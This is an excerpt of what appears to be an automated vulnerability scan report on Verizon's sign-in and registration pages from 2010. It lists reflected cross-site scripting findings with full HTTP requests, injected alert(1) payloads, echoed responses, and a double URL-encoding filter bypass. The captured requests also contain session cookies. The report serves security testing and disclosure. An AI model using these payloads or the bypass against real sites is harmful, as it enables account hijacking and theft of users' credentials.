MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7200
Date: Sat, 20 Nov 2010 02:46:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASPSESSIONIDCQADSRDB=JFJJPGMCOIBMGHBLMKJGGKJD; path=/
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc67f45525d5f4f58455e445a4a423660;path=/
Content-Length: 129039

<!-- Vignette V6 Fri Nov 19 18:46:12 2010 -->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
trMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom;
}
if(bLog){
   window.location.href='https://www22.verizon.com/ForYourHome/ebillpay/code/MyVerizon2/Code/paymentoptions.aspx?71f4e";9ffd29efbfb=1';
<!-- Vignette V6 Fri Nov 19 18:46:12 2010 -->
...[SNIP]...

2.836. https://www22.verizon.com/ForyourHome/Registration/Reg/ORLogin.aspx [UIDPWD parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /ForyourHome/Registration/Reg/ORLogin.aspx

Issue detail

The value of the UIDPWD request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31ab8"><script>alert(1)</script>0ab8ac65924 was submitted in the UIDPWD parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ForyourHome/Registration/Reg/ORLogin.aspx?UIDPWD=Invalid31ab8"><script>alert(1)</script>0ab8ac65924&WTNOnly=Y HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA22V
Content-Type: text/html; charset=utf-8
Content-Length: 47366
Expires: Sat, 20 Nov 2010 02:33:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:33:55 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Verizon | Sign In</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta
...[SNIP]...
<INPUT type="hidden" value="/sso/redirect/redirect.asp?Target=https://www22.verizon.com/ForyourHome/GoFlow/MyVerizon/RegistrationBridge.aspx?FlowRoute=AMFBAU&UIDPWD=Invalid31ab8"><script>alert(1)</script>0ab8ac65924&WTNOnly=Y" name="target">
...[SNIP]...

2.837. https://www22.verizon.com/ForyourHome/Registration/Reg/ORLogin.aspx [WTNOnly parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /ForyourHome/Registration/Reg/ORLogin.aspx

Issue detail

The value of the WTNOnly request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3eb64"><script>alert(1)</script>4317d0b7492 was submitted in the WTNOnly parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ForyourHome/Registration/Reg/ORLogin.aspx?UIDPWD=Invalid&WTNOnly=Y3eb64"><script>alert(1)</script>4317d0b7492 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA22V
Content-Type: text/html; charset=utf-8
Content-Length: 47366
Expires: Sat, 20 Nov 2010 02:33:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:33:56 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Verizon | Sign In</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta
...[SNIP]...
<INPUT type="hidden" value="/sso/redirect/redirect.asp?Target=https://www22.verizon.com/ForyourHome/GoFlow/MyVerizon/RegistrationBridge.aspx?FlowRoute=AMFBAU&UIDPWD=Invalid&WTNOnly=Y3eb64"><script>alert(1)</script>4317d0b7492" name="target">
...[SNIP]...

2.838. https://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [3828e">HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /ForyourHome/Registration/Reg/OrLogin.aspx

Issue detail

The value of the 3828e"><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN request parameter is copied into the HTML document as plain text between tags. The payload 803f5<script>alert(1)</script>a7a0468d9ed was submitted in the 3828e"><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ForyourHome/Registration/Reg/OrLogin.aspx?3828e"><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN=1803f5<script>alert(1)</script>a7a0468d9ed HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Encoding: gzip, deflate
Cookie: CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; CMS_TimeZoneOffset=360; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; vzapps=STATE=TX; Source=CHSI; RegistrationApp=SessionId=fe2667e8-4e28-4de7-8250-68e0b90911ca; VZGEO=west
Host: www22.verizon.com
Connection: Keep-Alive
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA25V
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Sat, 20 Nov 2010 00:59:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:59:08 GMT
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 01:04:08 GMT; path=/foryourhome/registration/; domain=verizon.com
Content-Length: 47430


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Verizon | Sign In</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta
...[SNIP]...
</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN=1803f5<script>alert(1)</script>a7a0468d9ed" name="target">
...[SNIP]...

2.839. https://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [3828e%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /ForyourHome/Registration/Reg/OrLogin.aspx

Issue detail

The value of the 3828e%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN request parameter is copied into the HTML document as plain text between tags. The payload 78e35<script>alert(1)</script>a713bc75061 was submitted in the 3828e%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ForyourHome/Registration/Reg/OrLogin.aspx?3828e%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN=178e35<script>alert(1)</script>a713bc75061 HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA24V
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Sat, 20 Nov 2010 01:09:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:09:31 GMT
Connection: keep-alive
Set-Cookie: RegistrationApp=SessionId=00ac6571-3565-4f1f-9c9c-e471f00b0bd4; domain=.verizon.com; path=/
Set-Cookie: VZGEO=west; domain=.verizon.com; path=/
Set-Cookie: NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f945525d5f4f58455e445a4a423660;path=/
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 01:14:31 GMT; path=/foryourhome/registration/; domain=verizon.com
Content-Length: 47430


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Verizon | Sign In</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta
...[SNIP]...
</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN=178e35<script>alert(1)</script>a713bc75061" name="target">
...[SNIP]...

2.840. https://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www22.verizon.com
Path:   /ForyourHome/Registration/Reg/OrLogin.aspx

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4b4c%2522%253b3ba188f7951 was submitted in the REST URL parameter 3. This input was echoed as f4b4c";3ba188f7951 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /ForyourHome/Registration/f4b4c%2522%253b3ba188f7951/OrLogin.aspx?3828e"><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Encoding: gzip, deflate
Cookie: CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; CMS_TimeZoneOffset=360; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; vzapps=STATE=TX; Source=CHSI; RegistrationApp=SessionId=fe2667e8-4e28-4de7-8250-68e0b90911ca; VZGEO=west
Host: www22.verizon.com
Connection: Keep-Alive
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7200
Date: Sun, 21 Nov 2010 17:27:44 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: ASPSESSIONIDSQBQDRBA=OIPNFEFAHPIHODOJPPBKLEOL; path=/
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc66445525d5f4f58455e445a4a423660;path=/
Set-Cookie: ak-sf=false; expires=Sun, 21-Nov-2010 17:32:44 GMT; path=/myverizon/; domain=verizon.com
Content-Length: 129121

<!-- Vignette V6 Sun Nov 21 09:27:43 2010 -->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
ment.cookie="MyVzCom=remopt=Y&uid="+strMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom;
}
if(bLog){
   window.location.href='https://www22.verizon.com/ForyourHome/Registration/f4b4c";3ba188f7951/OrLogin.aspx?3828e"scriptalert1/scriptHOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN=1';
<!-- Vignette V6 Sun Nov 21 09:27:43 2010 -->
...[SNIP]...

2.841. https://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /ForyourHome/Registration/Reg/OrLogin.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5db6f<script>alert(1)</script>d983fc34cd0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ForyourHome/Registration/Reg/OrLogin.aspx?3828e"><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN=1&5db6f<script>alert(1)</script>d983fc34cd0=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Encoding: gzip, deflate
Cookie: CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; CMS_TimeZoneOffset=360; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; vzapps=STATE=TX; Source=CHSI; RegistrationApp=SessionId=fe2667e8-4e28-4de7-8250-68e0b90911ca; VZGEO=west
Host: www22.verizon.com
Connection: Keep-Alive
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA25V
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Sat, 20 Nov 2010 01:03:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:03:14 GMT
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 01:08:14 GMT; path=/foryourhome/registration/; domain=verizon.com
Content-Length: 47433


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Verizon | Sign In</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta
...[SNIP]...
</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN=1&5db6f<script>alert(1)</script>d983fc34cd0=1" name="target">
...[SNIP]...

2.842. https://www22.verizon.com/foryourhome/GoFlow/MyVerizon/RegistrationBridge.aspx [Client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /foryourhome/GoFlow/MyVerizon/RegistrationBridge.aspx

Issue detail

The value of the Client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b116d"%3balert(1)//c8e1f41e796 was submitted in the Client parameter. This input was echoed as b116d";alert(1)//c8e1f41e796 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /foryourhome/GoFlow/MyVerizon/RegistrationBridge.aspx?FlowRoute=EFiOSTV-CHNL&Client=MYVERb116d"%3balert(1)//c8e1f41e796&getstarted=6hboupsell HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
